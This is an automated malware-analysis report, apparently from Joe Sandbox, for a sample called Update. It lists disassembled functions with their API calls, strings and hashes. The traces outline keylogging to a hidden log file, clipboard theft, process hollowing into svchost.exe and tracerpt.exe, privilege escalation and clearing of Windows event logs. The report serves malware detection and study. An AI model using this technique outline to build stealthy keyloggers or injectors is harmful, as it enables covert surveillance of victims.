Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 13c8da13fabdb43a0039df29cdbc36604e7b86c2d4870efbc9606bf7f6935c8f
Instruction ID: caee183b5a6c68c45fee89ce5ab94ef9cb690e012967d693a85690ee7ea4d081
Opcode Fuzzy Hash: 13c8da13fabdb43a0039df29cdbc36604e7b86c2d4870efbc9606bf7f6935c8f
Instruction Fuzzy Hash: 20C04C3424C314E9F430D1442C46B5C1401F75EB65EB543177B205E4D74D7040C13553

Function 006E1000 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

TCGamerUpdateMain.UPDATE(?,?), ref: 006E100B

Memory Dump Source

Source File: 00000003.00000002.3509326012.00000000006E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.3509290719.00000000006E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509400316.00000000006E3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509430070.00000000006E4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509430070.0000000000726000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_Update.jbxd

Similarity

API ID: GamerMainUpdate
String ID:
API String ID: 3533789159-0
Opcode ID: 0dc032e54f475a4c8a862538ffc73d883b9d6e7095286aea5a65631e74e2db75
Instruction ID: 28034df6474dda31f037e6eb4f966e12df9777db339dfff13fbf2fa9710df3ca
Opcode Fuzzy Hash: 0dc032e54f475a4c8a862538ffc73d883b9d6e7095286aea5a65631e74e2db75
Instruction Fuzzy Hash: 0DB092B666034C6B8B84EAD9EC42C9A339D5A49654B408018BE0C8F241E936FA9497A5

Function 1001F63D Relevance: 1.5, APIs: 1, Instructions: 3networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 1001F63D

Memory Dump Source

Source File: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: b133ea7d05f53c3c11ad6334d0588478f261473ccb87b5617e28918120fa56af
Instruction ID: 6b957aef4a72e5dc30e8cb3213a85d60c43ac51bc1e09057d618b7ba0e2fc2ae
Opcode Fuzzy Hash: b133ea7d05f53c3c11ad6334d0588478f261473ccb87b5617e28918120fa56af
Instruction Fuzzy Hash: 8D900238288511FAA2124A2158897593654D6145423185418DC02C9010D631C2806514

Function 6CA818C0 Relevance: 1.4, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f8d2e113b6967570d864d0ee9d7acc9061ba4fe6a939ffdc1cd7be47a58ccbd
Instruction ID: 85d44c26d68dffdbcc28f8df62a843aa77d9d53a830265b461019e67592853c8
Opcode Fuzzy Hash: 0f8d2e113b6967570d864d0ee9d7acc9061ba4fe6a939ffdc1cd7be47a58ccbd
Instruction Fuzzy Hash: C461DF71A06A069BC704CFA9C4846B9B7B1FF45328B148729D27597E90E730E8D5CB91

Function 10005EB2 Relevance: 1.3, APIs: 1, Instructions: 15sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 10005EB2

Part of subcall function 10006F17: _malloc.LIBCMT ref: 10006F31

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Sleep_malloc
String ID:
API String ID: 617756273-0
Opcode ID: bd1a2801bd1f1b37b244e82fcf0364694be79379b717d5536a6d8ec7b8dccb93
Instruction ID: c703cf204976232012e29921027dce2d5ea17eb50e6b597cbfa29dc34b4da51f
Opcode Fuzzy Hash: bd1a2801bd1f1b37b244e82fcf0364694be79379b717d5536a6d8ec7b8dccb93
Instruction Fuzzy Hash: 6CD0A772D08202CBE7B0EDD048C403D6052A758284F74803DD6059D001D5718D849382

Function 6CA980E0 Relevance: 1.3, APIs: 1, Instructions: 4sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00011D28), ref: 6CA980E5

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 90a522dfca6c0972462d0f11b992ae2bbcc4168f7715db6fa897f214e086ebb2
Instruction ID: 74264c5d85e0896451430235ef1ff54d7ecad865ac635c95dc08874ee759efc0
Opcode Fuzzy Hash: 90a522dfca6c0972462d0f11b992ae2bbcc4168f7715db6fa897f214e086ebb2
Instruction Fuzzy Hash: 25A002B575220546478857B5580EC8665F45FA9712741C5217321D9144DA744191D525

Non-executed Functions

Function 037FE850 Relevance: 72.1, APIs: 36, Strings: 5, Instructions: 311stringfilesynchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 037FE8A9
Sleep.KERNEL32(00000001,?,?,?,037F604D), ref: 037FE8B3
GetTickCount.KERNEL32 ref: 037FE8BF
GetTickCount.KERNEL32 ref: 037FE8D2
InterlockedExchange.KERNEL32(03821F08,00000000), ref: 037FE8DA
OpenClipboard.USER32(00000000), ref: 037FE8E2
GetClipboardData.USER32(0000000D), ref: 037FE8EA
GlobalSize.KERNEL32(00000000), ref: 037FE8FB
GlobalLock.KERNEL32(00000000), ref: 037FE90C
wsprintfW.USER32 ref: 037FE985
_memset.LIBCMT ref: 037FE9A3
GlobalUnlock.KERNEL32(00000000), ref: 037FE9AC
CloseClipboard.USER32 ref: 037FE9B2
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 037FE9CA
CreateFileW.KERNEL32(03820D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 037FE9E4
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 037FEA02
lstrlenW.KERNEL32(03815B48,?,00000000), ref: 037FEA16
WriteFile.KERNEL32(00000000,03815B48,00000000), ref: 037FEA25
CloseHandle.KERNEL32(00000000), ref: 037FEA2C
ReleaseMutex.KERNEL32(00000000), ref: 037FEA38
GetKeyState.USER32(00000014), ref: 037FEABC
lstrlenW.KERNEL32(0381B4A8), ref: 037FEB0B
wsprintfW.USER32 ref: 037FEB1D
lstrlenW.KERNEL32(0381B4D0), ref: 037FEB3E
lstrlenW.KERNEL32(0381B4D0), ref: 037FEB61
wsprintfW.USER32 ref: 037FEB7F
wsprintfW.USER32 ref: 037FEB95
wsprintfW.USER32 ref: 037FEBBF
lstrlenW.KERNEL32(00000000), ref: 037FEC0B
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 037FEC21
CreateFileW.KERNEL32(03820D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 037FEC3B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 037FEC59
lstrlenW.KERNEL32(00000000,?,00000000), ref: 037FEC69
WriteFile.KERNEL32(00000000,00000000,00000000), ref: 037FEC74
CloseHandle.KERNEL32(00000000), ref: 037FEC7B
ReleaseMutex.KERNEL32(00000000), ref: 037FEC88

Strings

%s%s, xrefs: 037FEB17, 037FEB79
[, xrefs: 037FE97F
[esc], xrefs: 037FEB4E, 037FEB77, 037FEB8D, 037FEBB7
%s%s, xrefs: 037FEB8F
%s%s, xrefs: 037FEBB9

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock
String ID: [$%s%s$%s%s$%s%s$[esc]
API String ID: 1637302245-2373594894
Opcode ID: dc3414975b50e04bd463ae95a635f4abae7db58d36d29782001149148cf587f5
Instruction ID: 50f3e837268ae065b1a30b84a52a303fa64f5717417c718f0578f07cccaabee5
Opcode Fuzzy Hash: dc3414975b50e04bd463ae95a635f4abae7db58d36d29782001149148cf587f5
Instruction Fuzzy Hash: 7BC1BE70640700AFD770EF64DC88FAAB7B8FB48710F148AD9E25AD62A4D774A584CF61

Function 037F77E0 Relevance: 68.5, APIs: 30, Strings: 9, Instructions: 240libraryloaderinjectionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 037F7804
_memset.LIBCMT ref: 037F7850
GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 037F7864

Part of subcall function 037F8720: _vswprintf_s.LIBCMT ref: 037F8731

GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 037F7893
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 037F78DA

Part of subcall function 037F7740: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,037F78FC), ref: 037F7756
Part of subcall function 037F7740: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,037F78FC,?,?,?,?,?,?,74DF0630), ref: 037F775D

OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 037F790A
_memset.LIBCMT ref: 037F7923
LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 037F793B
GetProcAddress.KERNEL32(00000000), ref: 037F7944
LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 037F7956
GetProcAddress.KERNEL32(00000000), ref: 037F7959
LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 037F796B
GetProcAddress.KERNEL32(00000000), ref: 037F796E
LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 037F7980
GetProcAddress.KERNEL32(00000000), ref: 037F7983
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 037F798B
GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 037F7992
_memset.LIBCMT ref: 037F79B4
GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 037F79CA
VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 037F79FF
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 037F7A1B
VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 037F7A43
VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 037F7A58
WriteProcessMemory.KERNEL32(00000000,00000000,037F76F0,00001000,00000000), ref: 037F7A72
VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 037F7A90
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 037F7AA1
Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 037F7ABA
VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 037F7AD6
VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 037F7AE8
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 037F7AF1

Strings

ExitProcess, xrefs: 037F7946
%s%s, xrefs: 037F7876, 037F78AA
OpenProcess, xrefs: 037F7931
WaitForSingleObject, xrefs: 037F7970
Windows\SysWOW64\svchost.exe, xrefs: 037F7870
Windows\System32\svchost.exe, xrefs: 037F78A4
D, xrefs: 037F7840
Kernel32.dll, xrefs: 037F7936, 037F794B, 037F7960, 037F7975
WinExec, xrefs: 037F795B

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
API String ID: 4176418925-3213446972
Opcode ID: 7fd4576027911739c603c3ed4e53c6b3e1fae02f3937c8ece6a4e53b7f9c83c8
Instruction ID: 1d507320e77eb91ed2e3e07697822d09a343c57d986db2dfef819c29e70f2062
Opcode Fuzzy Hash: 7fd4576027911739c603c3ed4e53c6b3e1fae02f3937c8ece6a4e53b7f9c83c8
Instruction Fuzzy Hash: F9819371A403187FD725EBA59C49FDB777CEB95B00F0005D8F708A6281EAB4AA84CB65

Function 10005820 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135threadinjectionprocessCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 10005849
_memset.LIBCMT ref: 10005868
_memset.LIBCMT ref: 1000589D
GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 100058B1

Part of subcall function 100059E0: _vswprintf_s.LIBCMT ref: 100059F1

GetFileAttributesA.KERNEL32(?), ref: 100058E0
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 10005928
VirtualAllocEx.KERNEL32(?,00000000,000311BF,00003000,00000040,74DF0630), ref: 1000594E
WriteProcessMemory.KERNEL32(?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 10005968
GetThreadContext.KERNEL32(?,?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 10005987
SetThreadContext.KERNEL32(?,00010007,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 100059A2
ResumeThread.KERNEL32(?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 100059C1

Strings

D, xrefs: 1000587C
Windows\SysWOW64\tracerpt.exe, xrefs: 100058BD
%s%s, xrefs: 100058C3, 100058F7
Windows\System32\tracerpt.exe, xrefs: 100058EB

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
API String ID: 2170139861-1986163084
Opcode ID: c8561399999e88f50518954755fe2256d0c041f48f054e3226c8471d41118f6d
Instruction ID: 983fe607fc0b82aa02984a3f7cf9d741954c75fc9833714969104a2613b4b09b
Opcode Fuzzy Hash: c8561399999e88f50518954755fe2256d0c041f48f054e3226c8471d41118f6d
Instruction Fuzzy Hash: C8418EB0A00318EFE720CF60DC85FAA77B8EF48745F10859DF64D9B185DBB1AA848B54

Function 037F7E50 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 131threadinjectionprocessCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 037F7E73
_memset.LIBCMT ref: 037F7E9F
_memset.LIBCMT ref: 037F7ED4
GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 037F7EE8

Part of subcall function 037F8720: _vswprintf_s.LIBCMT ref: 037F8731

GetFileAttributesA.KERNEL32(?), ref: 037F7F15
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 037F7F65
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 037F7F92
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 037F7FAA
GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 037F7FCC
SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 037F7FEA
ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 037F7FFF

Strings

D, xrefs: 037F7EB3
%s%s, xrefs: 037F7EFA, 037F7F2C
Windows\SysWOW64\svchost.exe, xrefs: 037F7EEE
Windows\System32\svchost.exe, xrefs: 037F7F26

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
API String ID: 2170139861-2473635271
Opcode ID: d07847b47380b56aa05c87c49bb70e67f9acfeb147d0410091aa4c804d47f509
Instruction ID: 0152aa17c47fca7c00907e42708fcdc896468b98a735968a881bd7b65fa7564a
Opcode Fuzzy Hash: d07847b47380b56aa05c87c49bb70e67f9acfeb147d0410091aa4c804d47f509
Instruction Fuzzy Hash: F84172B5A00258AFDB24DB64DC85FDE77BCAB44700F0042D9E60DA6280EAB0AA85CF54

Function 037FE4F0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143synchronizationfilekeyboardCOMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,03820D80,74DEE010,74DF2FA0,74DF0F00,?,037F6028,?,?), ref: 037FE519
lstrcatW.KERNEL32(03820D80,\DisplaySessionContainers.log,?,037F6028,?,?), ref: 037FE529
CreateMutexW.KERNEL32(00000000,00000000,03820D80,?,037F6028,?,?), ref: 037FE538
WaitForSingleObject.KERNEL32(00000000,000000FF,?,037F6028,?,?), ref: 037FE546
CreateFileW.KERNEL32(03820D80,40000000,00000002,00000000,00000004,00000080,00000000,?,037F6028,?,?), ref: 037FE563
GetFileSize.KERNEL32(00000000,00000000,?,037F6028,?,?), ref: 037FE56E
CloseHandle.KERNEL32(00000000,?,037F6028,?,?), ref: 037FE577
DeleteFileW.KERNEL32(03820D80,?,037F6028,?,?), ref: 037FE58A
ReleaseMutex.KERNEL32(00000000,?,037F6028,?,?), ref: 037FE597
DirectInput8Create.DINPUT8(?,00000800,03814934,03821220,00000000,?,037F6028,?,?), ref: 037FE5B2
GetTickCount.KERNEL32 ref: 037FE665
GetKeyState.USER32(00000014), ref: 037FE672

Strings

<, xrefs: 037FE637
\DisplaySessionContainers.log, xrefs: 037FE51F

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
String ID: <$\DisplaySessionContainers.log
API String ID: 1095970075-1170057892
Opcode ID: 7f6b579da58a8c18fffa82ef2334eb81183525411d7a1f04d12664c02d9ced6d
Instruction ID: a9db30a8f57dffd3de3bc2774624472a8c25c26b37fa9aacb5d7138795dccdfd
Opcode Fuzzy Hash: 7f6b579da58a8c18fffa82ef2334eb81183525411d7a1f04d12664c02d9ced6d
Instruction Fuzzy Hash: 75419AB0740605AFD750EFA8EC49F9E7BA8FB48700F208599F625DB394C675E4428B94

Function 037F7620 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 69libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?,037FDFA4), ref: 037F7637
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,037FDFA4), ref: 037F763E
LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 037F765A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 037F7677
CloseHandle.KERNEL32(?), ref: 037F7681
GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,?,037FDFA4), ref: 037F7691
GetProcAddress.KERNEL32(00000000), ref: 037F7698
GetCurrentProcessId.KERNEL32 ref: 037F76BA
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 037F76C7

Strings

NtDll.dll, xrefs: 037F768C
SeDebugPrivilege, xrefs: 037F764C
NtSetInformationProcess, xrefs: 037F7687

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
API String ID: 1802016953-1577477132
Opcode ID: 1f81fc4d77f8bd0f0262b6d7a57389042f4d66d304fa821c2acc3de6a8bd299f
Instruction ID: c21a5b60860b74936bf784d83c7e9fdaedd1cdf10233ca61e85d59af9364b831
Opcode Fuzzy Hash: 1f81fc4d77f8bd0f0262b6d7a57389042f4d66d304fa821c2acc3de6a8bd299f
Instruction Fuzzy Hash: 9E214271A40308AFD710EBE4DC0AFBEB77CEB48710F404599FA15AA284DBB45944CBA5

Function 0380054D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92memorylibraryloaderCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 03800576
GetSystemInfo.KERNEL32(?), ref: 0380058E
GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0380059E
GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 038005AE
VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 03800600
VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 03800615

Strings

SetThreadStackGuarantee, xrefs: 038005A8
kernel32.dll, xrefs: 03800597

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
String ID: SetThreadStackGuarantee$kernel32.dll
API String ID: 3290314748-423161677
Opcode ID: 472ba81ecf7deec5922b83ad3315f521c8c5f245e278ba4e75a0b1b1184d63c9
Instruction ID: 96bdbfd3f18f72c36176c4d24632ff6a748152fdc7575c9e30879f9882f2012f
Opcode Fuzzy Hash: 472ba81ecf7deec5922b83ad3315f521c8c5f245e278ba4e75a0b1b1184d63c9
Instruction Fuzzy Hash: D131BFB2E40619AFDB60EBE4DC84AEEF7B9EB44744F1405A5E511F7180EB74AA04CB90

Function 037F7B70 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 037F7B89
OpenProcessToken.ADVAPI32(00000000), ref: 037F7B90
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 037F7BB6
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 037F7BCC
GetLastError.KERNEL32 ref: 037F7BD2
CloseHandle.KERNEL32(?), ref: 037F7BE0
CloseHandle.KERNEL32(?), ref: 037F7BFB

Strings

SeShutdownPrivilege, xrefs: 037F7BA2

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3435690185-3733053543
Opcode ID: 7208a66dc1e19bdf308d777c4ced7b9af0f0fcdb20e6082118d0ed2c318a5e1f
Instruction ID: ae53a1f3d0806739642ece4e979f00cd67f28069d28ace650c1aad843bf48f27
Opcode Fuzzy Hash: 7208a66dc1e19bdf308d777c4ced7b9af0f0fcdb20e6082118d0ed2c318a5e1f
Instruction Fuzzy Hash: 77117B71B402189FD714EFB4DC59FAEB77CEB48700F404599FA0597284DA759901CB90

Function 037FB3C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 26COMMON

Download Yara Rule

APIs

OpenEventLogW.ADVAPI32(00000000,038158BC), ref: 037FB3E7
ClearEventLogW.ADVAPI32(00000000,00000000), ref: 037FB3F2
CloseEventLog.ADVAPI32(00000000), ref: 037FB3F9

Strings

System, xrefs: 037FB3D6
Security, xrefs: 037FB3CE
Application, xrefs: 037FB3C6

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Event$ClearCloseOpen
String ID: Application$Security$System
API String ID: 1391105993-2169399579
Opcode ID: 2a26c06e6776069fd86e8af03b929219765fee5ba31f3b0b58ef0368cfa38ddb
Instruction ID: d1de29eb1e9556d6b3ebc6d7616b9aad58931212232d6761cb33167acba5c9b8
